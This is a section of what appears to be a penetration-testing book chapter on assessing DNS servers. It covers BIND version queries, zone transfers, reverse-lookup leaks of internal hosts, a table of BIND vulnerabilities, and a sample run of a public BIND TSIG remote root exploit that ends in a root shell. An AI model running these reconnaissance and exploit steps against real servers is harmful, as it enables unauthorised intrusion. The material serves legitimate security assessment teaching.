5.3 DNS

In Chapter 3, I covered the use of Domain Name System querying to enumerate and map IP networks. This involves launching forward and reverse queries, along with DNS zone transfers. DNS servers use two ports to fulfill requests: UDP port 53 to serve standard direct requests (e.g., to resolve names to IP addresses and vice versa) and TCP port 53 to serve DNS information during a zone transfer.

To fully assess DNS services (to identify exploitable vulnerabilities and other risks) you must do the following:

  • Retrieve DNS service version information

  • Attempt to perform DNS zone transfers against known domains

  • Attempt to perform mass reverse-lookup queries against internal address space

  • Test for process manipulation vulnerabilities

5.3.1 Retrieving DNS Service Version Information

DNS server version information can be gleaned directly across UDP port 53 by issuing a version.bind chaos txt request through the Unix dig utility. In Example 5-3, BIND 9.2.1 is running against mail.hmgcc.gov.uk.

Example 5-3. Using dig to glean BIND version information
# dig @mail.hmgcc.gov.uk version.bind chaos txt

; <<>> DiG 9.2.0 <<>> @mail.hmgcc.gov.uk version.bind chaos txt

;; global options:  printcmd

;; Got answer:

;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 21612

;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0


;version.bind.                  CH      TXT


version.bind.           0       CH      TXT     "9.2.1"

;; Query time: 29 msec


;; MSG SIZE  rcvd: 48

If you don't have access to a Unix-like system with dig, nslookup can be used in an interactive fashion from Windows, Unix, or MacOS to issue the same version.bind request. Example 5-4 shows that relay2.ucia.gov is running BIND 4.9.11 (a recent release of the BIND 4 server software).

Example 5-4. Using nslookup to gather BIND version information
# nslookup

> server relay2.ucia.gov

Default server: relay2.ucia.gov


> set class=chaos

> set type=txt

> version.bind

Server:         relay2.ucia.gov


VERSION.BIND    text = "4.9.11-REL"

5.3.2 DNS Zone Transfers

DNS services are primarily accessed through UDP port 53 when serving answers to DNS requests. Authoritative name servers also listen on TCP port 53 for synchronization and DNS zone transfer purposes.

As discussed previously in Chapter 3, a DNS zone file contains all the naming information the name server stores regarding a specific DNS domain. A DNS zone transfer can often be launched to retrieve details of nonpublic internal networks and other useful information that can help build an accurate map of the target infrastructure.

Windows tools, such as nslookup and the Sam Spade Windows client, can perform a DNS zone transfer (see the Section 3.3.2). However, the most effective method to issue a DNS zone transfer request against a specific DNS server is to use the Unix dig command, as shown in Example 5-5.

Example 5-5. Using dig to perform a DNS zone transfer
# dig @auth100.ns.uu.net ucia.gov axfr

; <<>> DiG 9.2.1 <<>> @auth100.ns.uu.net ucia.gov axfr

;; global options:  printcmd

ucia.gov.               86400   IN  NS     relay1.ucia.gov.

ucia.gov.               86400   IN  NS     auth100.ns.uu.net.

ucia.gov.               86400   IN  MX     5 relay2.ucia.gov.

relay2-qfe0.ucia.gov.   86400   IN  CNAME  relay2.ucia.gov.

relay1-qfe0.ucia.gov.   86400   IN  CNAME  relay1.ucia.gov.

ain-relay1-ext.ucia.gov. 86400  IN  CNAME  relay1.ucia.gov.

ex-rtr-191-a.ucia.gov.  86400   IN  A

ain-relay11-ext.ucia.gov. 86400 IN  CNAME  relay11.ucia.gov.

ex-rtr-191-b.ucia.gov.  86400   IN  A

relay.ucia.gov.         86400   IN  CNAME  relay1.ucia.gov.

relay2-int.ucia.gov.    86400   IN  CNAME  ain-relay2-le1.ucia.gov.

ain-relay11-qfe0.ucia.gov. 86400 IN CNAME  relay11.ucia.gov.

relay11-int.ucia.gov.   86400   IN  A

ain.ucia.gov.           86400   IN  A

foia.ucia.gov.          86400   IN  CNAME  www.foia.ucia.gov.

relay11.ucia.gov.       86400   IN  A

ain-relay2-ext.ucia.gov. 86400  IN  CNAME  relay2.ucia.gov.

relay1-ext.ucia.gov.    86400   IN  CNAME  relay1.ucia.gov.

relay11-qfe0.ucia.gov.  86400   IN  CNAME  relay11.ucia.gov.

relay2t.ucia.gov.       86400   IN  A

ain-relay2-qfe1.ucia.gov. 86400 IN  A

ain-relay1-qfe0.ucia.gov. 86400 IN  CNAME  relay1.ucia.gov.

ain-relay1-qfe1.ucia.gov. 86400 IN  A

ex-rtr.ucia.gov.        86400   IN  CNAME  ex-rtr-129.ucia.gov.

wais.ucia.gov.          86400   IN  CNAME  relay2.ucia.gov.

relay2-ext.ucia.gov.    86400   IN  CNAME  relay2.ucia.gov.

ain-relay1-int.ucia.gov. 86400  IN  CNAME  ain-relay1-qfe1.ucia.gov.

ain-relay.ucia.gov.     86400   IN  CNAME  relay1.ucia.gov.

relay11-ext.ucia.gov.   86400   IN  CNAME  relay11.ucia.gov.

relay1.ucia.gov.        86400   IN  A

relay2.ucia.gov.        86400   IN  A

ain-relay-int.ucia.gov. 86400   IN  CNAME  ain-relay1-qfe1.ucia.gov.

relay-int.ucia.gov.     86400   IN  CNAME  ain-relay1-qfe1.ucia.gov.

ex-rtr-129.ucia.gov.    86400   IN  HINFO  "Cisco 4000 Router"

ex-rtr-129.ucia.gov.    86400   IN  A

ain-relay2-int.ucia.gov. 86400  IN  CNAME  ain-relay2-le1.ucia.gov.

ain-relay2-le0.ucia.gov. 86400  IN  CNAME  relay2.ucia.gov.

relay1-int.ucia.gov.    86400   IN  CNAME  ain-relay1-qfe1.ucia.gov.

5.3.3 DNS Information Leaks and Reverse Lookup Attacks

Until recently, Check Point Firewall-1 shipped with a DNS "allow any to any" rule within its default policy. Many other firewalls also suffer from this oversight, so it is often possible to access DNS servers running on internal systems that should not be providing name service to the Internet.

For example, during a penetration test I undertook in 1998 against a multinational corporation, I completely mapped internal network space through misconfigured DNS servers. Through initial port scanning I found a handful of accessible DNS servers that, upon inspection, seemed to be connected to the internal network. I enumerated internal hosts and networks through one name server in particular, which allowed me to build a detailed map of the internal network space through a non-authoritative name server.

It is sometimes possible to connect directly to DNS servers on peripheral network boundaries (using UDP port 53) and issue requests relating to internal IP addresses. Example 5-6 shows how nslookup can be used to find internal addresses?easily done if you know internal IP address ranges (through enumeration done earlier in the testing process).

Example 5-6. Extracting internal host information through DNS
# nslookup

> set querytype=any

> server

Default server:



;; connection timed out; no servers could be reached


;; connection timed out; no servers could be reached



Address:       name = staging.corporate.com

An automated reverse DNS sweep tool such as ghba can be modified to query a specific name server for internal network information, but this can also be achieved simply by setting your /etc/resolv.conf file to point at the target name server instead of your local DNS servers. Example 5-7 shows how this can be done from a Unix environment.

Example 5-7. Automating the reverse lookup process with ghba
# cat /etc/resolv.conf


# ghba

Scanning Class C network 192.168.1... => gatekeeper.corporate.com => exch-cluster.corporate.com => exchange-1.corporate.com => exchange-2.corporate.com => sqlserver.corporate.com => staging.corporate.com

All in all, DNS servers running on internal hosts such as Windows 2000 Server platforms are useful to a determined attacker. Default Check Point firewall rules and weak network segmentation can be used by attackers to gather useful network information.

5.3.4 BIND Vulnerabilities

The Berkeley Internet Name Daemon (BIND) is run on most Unix name servers. The BIND service has been found to be vulnerable to a plethora of buffer overflow and denial of service attacks over recent years. The Internet Software Consortium (ISC) has created a very useful web page to track all publicly known vulnerabilities in BIND (see http://www.isc.org/products/BIND/bind-security.html). At the bottom of the ISC page is an excellent matrix documenting exactly which versions of BIND are vulnerable to each known attack. Table 5-1 shows a summary of the remotely exploitable vulnerabilities within BIND at the time of writing, with details of the affected versions of software.

Table 5-1. Remotely exploitable BIND vulnerabilities


CVE reference

BIND versions affected

SIG overflow


4.9.5-4.9.10, 8.1, 8.2-8.2.6, and 8.3-8.3.3

NXDOMAIN overflow


8.2-8.2.6 and 8.3-8.3.3

libresolv overflow



OpenSSL overflow


9.1.0, and 9.2.x if built with SSL

libbind overflow


4-4.9.9, 8-8.2.6, 8.3.0-8.3.2, and 9.2.0

TSIG overflow


8.2, 8.2.1, 8.2.2 patch levels 1-7 and 8.2.3 beta releases

nslookupcomplain( ) format string bug


4.9.3-4.9.5 patch level 1, 4.9.6 and 4.9.7

NXT record overflow


8.2, 8.2 patch level 1 and 8.2.1

Mike Schiffman has written a good paper that discusses the history of BIND vulnerabilities and details the current security posture of over 10,000 DNS servers. You can read his findings at http://www.packetfactory.net/papers/DNS-posture/.

Exploit scripts for some BIND vulnerabilities are publicly available from archive sites such as Packet Storm (http://www.packetstormsecurity.org).[1] As always, you can search the MITRE CVE and ISS X-Force lists at http://cve.mitre.org and http://xforce.iss.net, respectively.

[1] URLs for tools in this book are mirrored at the O'Reilly site, http://examples.oreilly.com/networksa/tools. BIND TSIG overflow exploit

You can find a number of public exploits for the BIND TSIG overflow, one of which is bind8x.c, from http://packetstormsecurity.org/0102-exploits.

Background information for the bug in question is accessible as a CERT advisory at http://www.cert.org/advisories/CA-2001-02.html and also by checking the MITRE CVE list for exposure reference CVE-2001-0010.

After identifying a vulnerable name server running BIND 8.2.1 or 8.2.2 (in this example at, you can launch the exploit as shown in Example 5-8.

Example 5-8. The BIND TSIG remote exploit
# ./bind8x

[*] named 8.2.x (< 8.2.3-REL) remote root exploit by lucysoft, Ix

[*] fixed by ian@cypherpunks.ca and jwilkins@bitland.net

[*] attacking (

[d] HEADER is 12 long

[d] infoleak_qry was 476 long

[*] iquery resp len = 719

[d] argevdisp1 = 080d7cd0, argevdisp2 = 4010d704

[*] retrieved stack offset = bffffa88

[d] evil_query(buff, bffffa88)

[d] shellcode is 134 long

[d] olb = 136

[*] injecting shellcode at 1

[*] connecting..

[*] wait for your shell..

Linux ns2 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000 i686 unknown

uid=0(root) gid=0(root) groups=0(root)

5.3.5 Microsoft DNS Service Vulnerabilities

Windows 2000 servers ship with built-in DNS services. As the Windows platform moves toward a native Active Directory model, historic naming services such as WINS are being superseded by DNS. Extracting Active Directory network service information

Details of authoritative Windows 2000 network services, such as Active Directory, LDAP, and Kerberos can be found by searching for SRV records when performing a DNS zone transfer against a known Windows 2000 server. RFC 2052 details the SRV record format and other information, but generally the following DNS SRV records can be found when testing a Windows 2000 server running DNS:

_gc._tcp       SRV priority=0,weight=100,port=3268,pdc.example.org

_kerberos._tcp SRV priority=0,weight=100,port=88,pdc.example.org

_kpasswd._tcp  SRV priority=0,weight=100,port=464,pdc.example.org

_ldap._tcp     SRV priority=0,weight=100,port=389,pdc.example.org

From analyzing the responses, you can identify servers running Active Directory Global Catalog and Kerberos services. LDAP is also used in organizations as a user directory, listing users along with telephone and other details (see the Section 5.7 later in this chapter for further information). Remote vulnerabilities in the Microsoft DNS server

At the time of writing, there is no easy way to list current Windows 2000 Server DNS vulnerabilities. Due to the way that DNS is built into the core operating system and the way Microsoft manages its advisories and patches, you must currently trawl through an abundance of advisories on the Microsoft site (at http://www.microsoft.com/technet/security/) and cross reference them to identify remotely exploitable DNS issues. A Google, MITRE CVE, or SecurityFocus search can often spread light over recent problems.